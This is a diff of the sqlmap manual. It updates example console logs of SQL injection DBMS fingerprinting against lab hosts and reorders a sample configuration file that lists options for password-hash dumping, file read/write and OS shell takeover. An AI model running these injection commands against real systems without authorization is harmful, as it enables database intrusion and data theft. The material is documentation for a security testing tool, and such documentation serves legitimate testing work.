<!-- TODO: improve examples on basic DBMS fingerprint -->
|
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
Options: <tt>-f</tt> or <tt>--fingerprint</tt>
|
Options: <tt>-f</tt> or <tt>--fingerprint</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
By default the web application's back-end database management system
|
By default the web application's back-end database management system
|
||||||
fingerprint is performed requesting a database specific function which
|
fingerprint is performed requesting a database specific function which
|
||||||
returns a known static value. By comparing this value with the returned
|
returns a known static value. By comparing these value with the returned
|
||||||
value it is possible to identify if the back-end database is effectively
|
value it is possible to identify if the back-end database is effectively
|
||||||
the one that sqlmap expected.
|
the one that sqlmap expected. Depending on the DBMS being tested, a
|
||||||
|
SQL dialect syntax which is syntatically correct depending upon the
|
||||||
|
back-end DBMS is also tested.
|
||||||
|
|
||||||
After identifying an injectable vector, sqlmap fingerprints the back-end
|
After identifying an injectable vector, sqlmap fingerprints the back-end
|
||||||
database management system and go ahead with the injection with their
|
database management system and go ahead with the injection with its
|
||||||
specific syntax within the limits of the database architecture.
|
specific syntax within the limits of the database architecture.
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -2158,17 +2158,12 @@ Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:14] [INFO] testing MySQL
|
[hh:mm:17] [INFO] testing MySQL
|
||||||
[hh:mm:14] [INFO] query: CONCAT(CHAR(51), CHAR(51))
|
[hh:mm:17] [INFO] confirming MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 33
|
[hh:mm:17] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:17] [INFO] retrieved: 5
|
||||||
[hh:mm:14] [INFO] confirming MySQL
|
[hh:mm:17] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] query: LENGTH(CHAR(51))
|
[hh:mm:17] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 1
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
|
|
||||||
[hh:mm:14] [INFO] retrieved: 3
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: MySQL >= 5.0.0
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
@ -2190,27 +2185,22 @@ Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:14] [INFO] testing MySQL
|
[hh:mm:49] [INFO] testing MySQL
|
||||||
[hh:mm:14] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
[hh:mm:49] [INFO] confirming MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 44
|
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved: 3
|
||||||
[hh:mm:14] [INFO] confirming MySQL
|
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] query: LENGTH(CHAR(52))
|
[hh:mm:49] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:14] [INFO] retrieved: 1
|
[hh:mm:49] [INFO] query: SELECT 3 FROM information_schema.PARAMETERS LIMIT 0, 1
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved:
|
||||||
[hh:mm:14] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved: 4
|
[hh:mm:49] [INFO] query: MID(@@table_open_cache, 1, 1)
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved:
|
||||||
[hh:mm:14] [INFO] query: SELECT 4 FROM information_schema.PARAMETERS LIMIT 0, 1
|
[hh:mm:49] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved:
|
[hh:mm:49] [INFO] query: MID(@@hostname, 1, 1)
|
||||||
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
[hh:mm:49] [INFO] retrieved: t
|
||||||
[hh:mm:14] [INFO] query: MID(@@plugin_dir, 1, 1)
|
[hh:mm:49] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:14] [INFO] retrieved:
|
[hh:mm:49] [INFO] executing MySQL comment injection fingerprint
|
||||||
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] query: MID(@@hostname, 1, 1)
|
|
||||||
[hh:mm:14] [INFO] retrieved: n
|
|
||||||
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:14] [INFO] executing MySQL comment injection fingerprint
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
|
back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
|
||||||
|
@ -2225,19 +2215,17 @@ Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:26] [WARNING] the back-end DMBS is not MySQL
|
[hh:mm:38] [WARNING] the back-end DMBS is not MySQL
|
||||||
[hh:mm:26] [INFO] testing Oracle
|
[hh:mm:38] [INFO] testing Oracle
|
||||||
[hh:mm:26] [INFO] query: LENGTH(SYSDATE)
|
[hh:mm:38] [INFO] confirming Oracle
|
||||||
[hh:mm:26] [INFO] retrieved: 9
|
[hh:mm:38] [INFO] the back-end DBMS is Oracle
|
||||||
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
||||||
[hh:mm:26] [INFO] confirming Oracle
|
[hh:mm:38] [INFO] retrieved: 10
|
||||||
[hh:mm:26] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
[hh:mm:38] [INFO] performed 20 queries in 0 seconds
|
||||||
[hh:mm:26] [INFO] retrieved: 10.2.0.1.0
|
|
||||||
[hh:mm:27] [INFO] performed 76 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: Oracle 10g
|
back-end DBMS: active fingerprint: Oracle 10g
|
||||||
html error message fingerprint: Oracle
|
html error message fingerprint: Oracle
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -2247,21 +2235,16 @@ Example on a <bf>PostgreSQL 8.3.5</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:48] [WARNING] the back-end DMBS is not Oracle
|
[hh:mm:14] [WARNING] the back-end DMBS is not Oracle
|
||||||
[hh:mm:48] [INFO] testing PostgreSQL
|
[hh:mm:14] [INFO] testing PostgreSQL
|
||||||
[hh:mm:48] [INFO] query: COALESCE(6, NULL)
|
[hh:mm:14] [INFO] confirming PostgreSQL
|
||||||
[hh:mm:48] [INFO] retrieved: 6
|
[hh:mm:14] [INFO] the back-end DBMS is PostgreSQL
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
|
||||||
[hh:mm:48] [INFO] confirming PostgreSQL
|
[hh:mm:14] [INFO] retrieved: 2
|
||||||
[hh:mm:48] [INFO] query: LENGTH(CHR(54))
|
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:48] [INFO] retrieved: 1
|
[hh:mm:14] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:14] [INFO] retrieved:
|
||||||
[hh:mm:48] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP()::text, 1, 1)
|
[hh:mm:14] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:48] [INFO] retrieved: 2
|
|
||||||
[hh:mm:48] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:48] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
|
|
||||||
[hh:mm:48] [INFO] retrieved:
|
|
||||||
[hh:mm:48] [INFO] performed 6 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
|
back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
|
||||||
|
@ -2282,12 +2265,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] query: LTRIM(STR(LEN(7)))
|
[hh:mm:41] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:41] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:41] [INFO] retrieved: 0
|
|
||||||
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
||||||
|
@ -2301,14 +2280,10 @@ Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
|
$ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:51] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:51] [INFO] testing Microsoft SQL Server
|
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] query: LTRIM(STR(LEN(0)))
|
[hh:mm:41] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] retrieved: 1
|
[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:51] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:51] [INFO] retrieved: 5
|
|
||||||
[hh:mm:51] [INFO] performed 13 queries in 0 seconds
|
|
||||||
web server operating system: Windows 2003 or 2000
|
web server operating system: Windows 2003 or 2000
|
||||||
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
|
||||||
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2005
|
||||||
|
@ -2326,30 +2301,25 @@ Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1 -f -b
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:24] [INFO] testing MySQL
|
[hh:mm:04] [INFO] testing MySQL
|
||||||
[hh:mm:24] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
[hh:mm:04] [INFO] confirming MySQL
|
||||||
[hh:mm:24] [INFO] retrieved: 44
|
[hh:mm:04] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
|
||||||
[hh:mm:24] [INFO] performed 20 queries in 0 seconds
|
[hh:mm:04] [INFO] retrieved: 0
|
||||||
[hh:mm:24] [INFO] confirming MySQL
|
[hh:mm:04] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:24] [INFO] query: LENGTH(CHAR(52))
|
[hh:mm:04] [INFO] the back-end DBMS is MySQL
|
||||||
[hh:mm:24] [INFO] retrieved: 1
|
[hh:mm:04] [INFO] query: VERSION()
|
||||||
[hh:mm:24] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
|
||||||
[hh:mm:24] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
[hh:mm:05] [INFO] performed 111 queries in 1 seconds
|
||||||
[hh:mm:24] [INFO] retrieved: 4
|
[hh:mm:05] [INFO] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
|
||||||
[hh:mm:24] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved:
|
||||||
[hh:mm:24] [INFO] query: VERSION()
|
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:24] [INFO] retrieved: 5.0.67-0ubuntu6
|
[hh:mm:05] [INFO] query: MID(@@table_open_cache, 1, 1)
|
||||||
[hh:mm:25] [INFO] performed 111 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved:
|
||||||
[hh:mm:25] [INFO] query: SELECT 4 FROM information_schema.PARAMETERS LIMIT 0, 1
|
[hh:mm:05] [INFO] performed 6 queries in 0 seconds
|
||||||
[hh:mm:25] [INFO] retrieved:
|
[hh:mm:05] [INFO] query: MID(@@hostname, 1, 1)
|
||||||
[hh:mm:25] [INFO] performed 6 queries in 0 seconds
|
[hh:mm:05] [INFO] retrieved: t
|
||||||
[hh:mm:25] [INFO] query: MID(@@plugin_dir, 1, 1)
|
[hh:mm:06] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:25] [INFO] retrieved:
|
[hh:mm:06] [INFO] executing MySQL comment injection fingerprint
|
||||||
[hh:mm:25] [INFO] performed 6 queries in 0 seconds
|
|
||||||
[hh:mm:25] [INFO] query: MID(@@hostname, 1, 1)
|
|
||||||
[hh:mm:25] [INFO] retrieved: n
|
|
||||||
[hh:mm:25] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:25] [INFO] executing MySQL comment injection fingerprint
|
|
||||||
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
web application technology: PHP 5.2.6, Apache 2.2.9
|
web application technology: PHP 5.2.6, Apache 2.2.9
|
||||||
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
|
||||||
|
@ -2373,11 +2343,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(3)))
|
[hh:mm:03] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] retrieved: 1
|
[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:03] [INFO] retrieved: 0
|
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
||||||
[hh:mm:03] [INFO] query: @@VERSION
|
[hh:mm:03] [INFO] query: @@VERSION
|
||||||
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
||||||
|
@ -2405,12 +2372,8 @@ $ python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v
|
||||||
[...]
|
[...]
|
||||||
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
||||||
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(8)))
|
[hh:mm:03] [INFO] confirming Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] retrieved: 1
|
[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
||||||
[hh:mm:03] [INFO] retrieved: 5
|
|
||||||
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
||||||
[hh:mm:03] [INFO] query: @@VERSION
|
[hh:mm:03] [INFO] query: @@VERSION
|
||||||
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
|
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
|
||||||
Oct 14 2005 00:33:37
|
Oct 14 2005 00:33:37
|
||||||
|
@ -4112,78 +4075,81 @@ INI file, <tt>sqlmap-SAUbs.conf</tt>.
|
||||||
$ cat sqlmap-SAUbs.conf
|
$ cat sqlmap-SAUbs.conf
|
||||||
|
|
||||||
[Target]
|
[Target]
|
||||||
googleDork =
|
|
||||||
list =
|
|
||||||
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
|
url = http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1
|
||||||
|
googledork =
|
||||||
|
list =
|
||||||
|
|
||||||
[Request]
|
[Request]
|
||||||
aCred =
|
threads = 1
|
||||||
aType =
|
useragentsfile =
|
||||||
|
atype =
|
||||||
agent =
|
agent =
|
||||||
cookie =
|
|
||||||
data =
|
|
||||||
delay = 0
|
delay = 0
|
||||||
headers =
|
headers =
|
||||||
method = GET
|
cookie =
|
||||||
proxy =
|
proxy =
|
||||||
|
timeout = 10
|
||||||
|
acred =
|
||||||
referer =
|
referer =
|
||||||
threads = 1
|
data =
|
||||||
timeout = None
|
method = GET
|
||||||
userAgentsFile =
|
|
||||||
|
|
||||||
[Miscellaneous]
|
[Miscellaneous]
|
||||||
batch = False
|
updateall = False
|
||||||
eta = False
|
eta = False
|
||||||
sessionFile =
|
verbose = 2
|
||||||
updateAll = False
|
batch = False
|
||||||
verbose = 1
|
sessionfile =
|
||||||
|
|
||||||
[Enumeration]
|
[Enumeration]
|
||||||
col =
|
dumpall = False
|
||||||
|
limitstop = 0
|
||||||
|
getusers = False
|
||||||
|
isdba = False
|
||||||
|
getpasswordhashes = False
|
||||||
|
excludesysdbs = False
|
||||||
|
getcurrentdb = False
|
||||||
|
gettables = False
|
||||||
|
dumptable = False
|
||||||
db =
|
db =
|
||||||
dumpAll = False
|
limitstart = 0
|
||||||
dumpTable = False
|
getprivileges = False
|
||||||
excludeSysDbs = False
|
sqlshell = False
|
||||||
getBanner = True
|
|
||||||
getColumns = False
|
|
||||||
getCurrentDb = False
|
|
||||||
getCurrentUser = False
|
|
||||||
getDbs = False
|
|
||||||
getPasswordHashes = False
|
|
||||||
getPrivileges = False
|
|
||||||
getTables = False
|
|
||||||
getUsers = False
|
|
||||||
limitStart = 0
|
|
||||||
limitStop = 0
|
|
||||||
query =
|
|
||||||
sqlShell = False
|
|
||||||
tbl =
|
tbl =
|
||||||
|
getcolumns = False
|
||||||
|
query =
|
||||||
|
getdbs = False
|
||||||
user =
|
user =
|
||||||
|
col =
|
||||||
|
getcurrentuser = False
|
||||||
|
getbanner = True
|
||||||
|
|
||||||
[File system]
|
[File system]
|
||||||
rFile =
|
wfile =
|
||||||
wFile =
|
rfile =
|
||||||
|
|
||||||
[Takeover]
|
[Takeover]
|
||||||
osShell = False
|
osshell = False
|
||||||
|
|
||||||
[Fingerprint]
|
[Fingerprint]
|
||||||
extensiveFp = False
|
extensivefp = False
|
||||||
|
|
||||||
[Injection]
|
[Injection]
|
||||||
|
estring =
|
||||||
dbms =
|
dbms =
|
||||||
eRegexp =
|
string =
|
||||||
eString =
|
|
||||||
postfix =
|
postfix =
|
||||||
prefix =
|
prefix =
|
||||||
|
testparameter =
|
||||||
regexp =
|
regexp =
|
||||||
string =
|
eregexp =
|
||||||
testParameter =
|
|
||||||
|
|
||||||
[Techniques]
|
[Techniques]
|
||||||
timeTest = False
|
stackedtest = False
|
||||||
unionTest = False
|
utech =
|
||||||
unionUse = False
|
unionuse = False
|
||||||
|
timetest = False
|
||||||
|
uniontest = False
|
||||||
</verb></tscreen>
|
</verb></tscreen>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
|
@ -4195,7 +4161,6 @@ with the <tt>-c</tt> option as explained above in section 5.2:
|
||||||
$ python sqlmap.py -c "sqlmap-SAUbs.conf"
|
$ python sqlmap.py -c "sqlmap-SAUbs.conf"
|
||||||
|
|
||||||
[...]
|
[...]
|
||||||
|
|
||||||
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
|
[hh:mm:16] [INFO] performed 657 queries in 6 seconds
|
||||||
|
|
||||||
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
|
banner: 'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real
|
||||||
|
|
Loading…
Reference in New Issue
Block a user